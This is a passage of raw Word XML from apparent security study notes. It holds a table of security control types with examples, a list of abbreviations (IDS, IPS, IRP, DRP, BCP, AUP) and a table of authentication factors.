          <w:p w14:paraId="08FA815F" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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0D41C2A7" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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ED5296E" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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42A3339B" w14:textId="03B9043B" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="005209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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09FFA890" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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14:paraId="2FF25B54" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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14:paraId="7FA67623" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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A6AE0" w:rsidRPr="005B4891" w14:paraId="2EABBA4D" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1406" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BA4D9D9" w14:textId="0B653B89" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="005209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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Preventative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E462750" w14:textId="4237F657" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="005209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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Det</w:t>
            </w:r>
            <w:r w:rsidR="00E02E7B" w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>errent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="345ED47F" w14:textId="2145BFB5" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E02E7B" w:rsidP="005209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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Detective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="350ADAF6" w14:textId="7F7D4D68" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E02E7B" w:rsidP="005209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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Corrective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C7EEC80" w14:textId="3DA8ADBC" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E02E7B" w:rsidP="005209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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Compensating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1209" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C43E23D" w14:textId="47ECE645" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E02E7B" w:rsidP="005209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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1182" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="434AFBD4" w14:textId="3530D969" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E02E7B" w:rsidP="0052096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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Directive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6AE0" w:rsidRPr="005B4891" w14:paraId="7D34B9EB" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1406" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D16DDFD" w14:textId="40E17E12" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E02E7B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Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="414EE75C" w14:textId="34A08ABE" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="004472C6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Signs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B0E93F6" w14:textId="3287BC5C" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="007767D9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SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2593AB7C" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00FE1676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Backup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="494EE82F" w14:textId="3106FB4C" w:rsidR="00DA489D" w:rsidRPr="005B4891" w:rsidRDefault="00DA489D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Restore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="732E262B" w14:textId="6241C7B6" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="005429C5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Segmentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1209" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="750A2E9E" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00EC73EC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Backup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7B2A52" w14:textId="68D9779A" w:rsidR="00EC73EC" w:rsidRPr="005B4891" w:rsidRDefault="00EC73EC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Restore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1182" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C135871" w14:textId="0F082834" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="005D2AB1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AUP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6AE0" w:rsidRPr="005B4891" w14:paraId="43F7FBC1" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1406" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6ACD6886" w14:textId="025D1603" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E02E7B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App filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EF0803D" w14:textId="77777777" w:rsidR="00BA6AE0" w:rsidRPr="005B4891" w:rsidRDefault="00BA6AE0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CCTV</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="652FDC21" w14:textId="6992C731" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00BA6AE0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Cameras</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65927BFE" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E85330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CCTV</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="781CDD23" w14:textId="69F0E4A2" w:rsidR="00E85330" w:rsidRPr="005B4891" w:rsidRDefault="00E85330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Cameras</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="065C9149" w14:textId="3A20EE39" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="0020631C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IRP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="283E63E1" w14:textId="6CDAAE9D" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00A85E59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Virtualization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1209" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C8A77B7" w14:textId="3A512763" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00EC73EC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DRP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1182" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DB30BA0" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="005D2AB1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Password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="671FA489" w14:textId="2E776239" w:rsidR="005D2AB1" w:rsidRPr="005B4891" w:rsidRDefault="005D2AB1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Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6AE0" w:rsidRPr="005B4891" w14:paraId="793576F4" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1406" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C3B5865" w14:textId="77777777" w:rsidR="00BA6AE0" w:rsidRPr="005B4891" w:rsidRDefault="00E02E7B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 xml:space="preserve">Access </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49786E4D" w14:textId="77777777" w:rsidR="00BA6AE0" w:rsidRPr="005B4891" w:rsidRDefault="00E02E7B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 xml:space="preserve">control </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B81E8BE" w14:textId="7BBAD488" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E02E7B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system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61CA7B64" w14:textId="52FD094D" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00BA6AE0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Guards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17AE4C20" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="007767D9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IPS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FEC9846" w14:textId="55F3FF35" w:rsidR="007767D9" w:rsidRPr="005B4891" w:rsidRDefault="007767D9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DPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="229A9351" w14:textId="5723A81D" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00C743C6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DRP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F1254C2" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE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1D4A5126" w14:textId="06A65ED7" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00EC73EC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BCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1182" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AA421C3" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="005D2AB1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4EB523F8" w14:textId="77777777" w:rsidR="005D2AB1" w:rsidRPr="005B4891" w:rsidRDefault="005D2AB1" w:rsidP="0052096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Classification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4717DAE6" w14:textId="0D12705F" w:rsidR="005D2AB1" w:rsidRPr="005B4891" w:rsidRDefault="005D2AB1" w:rsidP="00520960">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="708" w:hanging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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E7E476F" w14:textId="77777777" w:rsidR="00AE71D4" w:rsidRPr="005B4891" w:rsidRDefault="00AE71D4" w:rsidP="00CC6D2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F89F09" w14:textId="24A524B7" w:rsidR="00CC6D2B" w:rsidRPr="005B4891" w:rsidRDefault="00CC6D2B" w:rsidP="00CC6D2B">
      <w:pPr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IDS = Intrusion detection system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F9FB35" w14:textId="77777777" w:rsidR="00CC6D2B" w:rsidRPr="005B4891" w:rsidRDefault="00CC6D2B" w:rsidP="00CC6D2B">
      <w:pPr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IPS = Intrusion prevention system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AB2F8D" w14:textId="78FE810B" w:rsidR="00607A87" w:rsidRPr="005B4891" w:rsidRDefault="00607A87" w:rsidP="00C05AC8">
      <w:pPr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IRP = Incident Response Plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C58737" w14:textId="12F8E17D" w:rsidR="00285FC1" w:rsidRPr="005B4891" w:rsidRDefault="00E83597" w:rsidP="00C05AC8">
      <w:pPr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 xml:space="preserve">DRP = </w:t>
      </w:r>
      <w:r w:rsidR="00EC73EC" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Disaster Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC73EC" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468338A8" w14:textId="6CF99AC7" w:rsidR="00235807" w:rsidRPr="005B4891" w:rsidRDefault="00235807" w:rsidP="00C05AC8">
      <w:pPr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BCP = Business Continuity Plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B988F7B" w14:textId="676B809A" w:rsidR="00BC2C64" w:rsidRPr="005B4891" w:rsidRDefault="00BC2C64" w:rsidP="00C05AC8">
      <w:pPr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AUP = Acceptable Use Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4276216F" w14:textId="75585EB8" w:rsidR="00536C4E" w:rsidRPr="00A05553" w:rsidRDefault="00536C4E" w:rsidP="00BF5DE0">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc198019356"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Authentication Factors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7B4F1540" w14:textId="77777777" w:rsidR="00536C4E" w:rsidRPr="005B4891" w:rsidRDefault="00536C4E" w:rsidP="00C05AC8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DBD170B" w14:textId="77777777" w:rsidR="00536C4E" w:rsidRPr="005B4891" w:rsidRDefault="00536C4E" w:rsidP="00536C4E">
      <w:pPr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Categorie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54"/>
        <w:gridCol w:w="1791"/>
        <w:gridCol w:w="1991"/>
        <w:gridCol w:w="1758"/>
        <w:gridCol w:w="1768"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F4745C" w:rsidRPr="005B4891" w14:paraId="57D0BD6E" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1754" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A5C636F" w14:textId="77777777" w:rsidR="004769BA" w:rsidRPr="005B4891" w:rsidRDefault="004769BA" w:rsidP="0052096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14:paraId="655F67B1" w14:textId="77777777" w:rsidR="004769BA" w:rsidRPr="005B4891" w:rsidRDefault="004769BA" w:rsidP="0052096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482F3E3F" w14:textId="77777777" w:rsidR="004769BA" w:rsidRPr="005B4891" w:rsidRDefault="00D217D9" w:rsidP="0052096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Authentication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1819DE3B" w14:textId="519E224C" w:rsidR="00D217D9" w:rsidRPr="005B4891" w:rsidRDefault="00D217D9" w:rsidP="0052096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Factors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1758" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="336F3CD3" w14:textId="77777777" w:rsidR="004769BA" w:rsidRPr="005B4891" w:rsidRDefault="004769BA" w:rsidP="0052096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14:paraId="4D7D37C1" w14:textId="77777777" w:rsidR="004769BA" w:rsidRPr="005B4891" w:rsidRDefault="004769BA" w:rsidP="0052096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20960" w:rsidRPr="005B4891" w14:paraId="78899038" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1754" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68966899" w14:textId="77777777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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Something</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E000863" w14:textId="4D0E1A20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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>you know</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="624EBF97" w14:textId="267A3BAE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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>IP-addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1991" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D504D5D" w14:textId="77777777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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Something</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0218E6FD" w14:textId="4C0CBB0A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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>you are</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1758" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12609717" w14:textId="77777777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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Something</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1062374D" w14:textId="55896824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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>you do</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1768" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7ECDB142" w14:textId="77777777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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Somewhere</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22F05214" w14:textId="16C7B616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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>you are</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00520960" w:rsidRPr="005B4891" w14:paraId="6BA56DB2" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1754" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7667A329" w14:textId="77777777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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506EB512" w14:textId="6C4FBEFB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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42254FC7" w14:textId="671CE987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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Smartcard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1991" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C724FC6" w14:textId="3A97A9E2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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Biometrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1758" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="386B2789" w14:textId="132DE352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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Pattern recognition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1768" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01D88CFD" w14:textId="216ACA1F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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Geo-location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00520960" w:rsidRPr="005B4891" w14:paraId="0EE95879" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1754" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="446E30D0" w14:textId="08554A2A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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>PIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="525382BD" w14:textId="635CFE1C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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Keyfob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1991" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68CB6B11" w14:textId="1D3ED3E8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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>DNA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1758" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ED76648" w14:textId="70FA0DC2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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Puzzles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1768" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="087BC2B5" w14:textId="4BF4A104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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Trusted network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00520960" w:rsidRPr="005B4891" w14:paraId="712B1A2C" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1754" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28F3CEB5" w14:textId="1DB6811F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891">
              <w:rPr>
